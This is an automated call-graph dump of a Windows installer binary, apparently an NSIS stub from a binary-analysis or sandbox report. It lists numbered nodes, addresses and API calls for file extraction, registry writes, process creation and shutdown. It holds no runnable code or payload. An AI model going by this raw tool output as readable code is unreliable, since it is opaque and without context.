4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 